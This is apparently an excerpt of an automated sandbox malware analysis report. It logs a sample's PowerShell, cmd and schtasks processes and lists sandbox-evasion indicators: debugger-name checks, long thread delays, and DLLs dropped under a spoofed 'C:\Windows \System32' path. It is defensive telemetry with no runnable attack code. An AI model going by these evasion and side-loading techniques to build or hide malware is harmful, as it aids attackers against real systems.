Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\schtasks.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: svchost.exe, 0000002A.00000002.3449729846.00000266EA490000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: @X64DBG.EXE
Source: console_zero.exe, 0000002D.00000003.2558603205.000001D7ED370000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559283359.000001D7ED37D000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559967746.000001D7ED3B7000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559433335.000001D7ED385000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2560599446.000001D7ED3D5000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2562659316.000001D7ED3E3000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2558687370.000001D7ED377000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2561890551.000001D7ED3DC000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2559719592.000001D7ED39A000.00000004.00000020.00020000.00000000.sdmp, console_zero.exe, 0000002D.00000003.2558258022.000001D7ED35D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: TTTRACER.DLLT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\svchost.exe | Thread delayed: delay time: 6000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1704
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 8019
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1445
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 7812
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1822
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2949
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6228
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3363
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6802
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2870
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6367
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3303
Source: C:\Windows \System32\printui.exe | Dropped PE file which has not been started: C:\Windows\System32\vcruntime140d.dll
Source: C:\Windows \System32\printui.exe | Dropped PE file which has not been started: C:\Windows\System32\ucrtbased.dll
Source: C:\Windows\System32\svchost.exe | API coverage: 1.3 %
Source: C:\Windows\System32\console_zero.exe | API coverage: 1.8 %
Source: C:\Windows\System32\crypti.exe | API coverage: 9.0 %
Source: C:\Windows\System32\crypti.exe | API coverage: 9.0 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8152 | Thread sleep count: 7745 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140 | Thread sleep count: 1704 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6708 | Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 2536 | Thread sleep count: 87 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7664 | Thread sleep count: 8019 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2688 | Thread sleep time: -6456360425798339s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5608 | Thread sleep count: 1445 > 30
Source: C:\Windows\System32\svchost.exe TID: 7368 | Thread sleep time: -30000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 | Thread sleep count: 7812 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5748 | Thread sleep count: 1822 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6848 | Thread sleep time: -5534023222112862s >= -30000s
Source: C:\Windows\System32\timeout.exe TID: 7896 | Thread sleep count: 88 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7732 | Thread sleep count: 6669 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5128 | Thread sleep time: -8301034833169293s >= -30000s
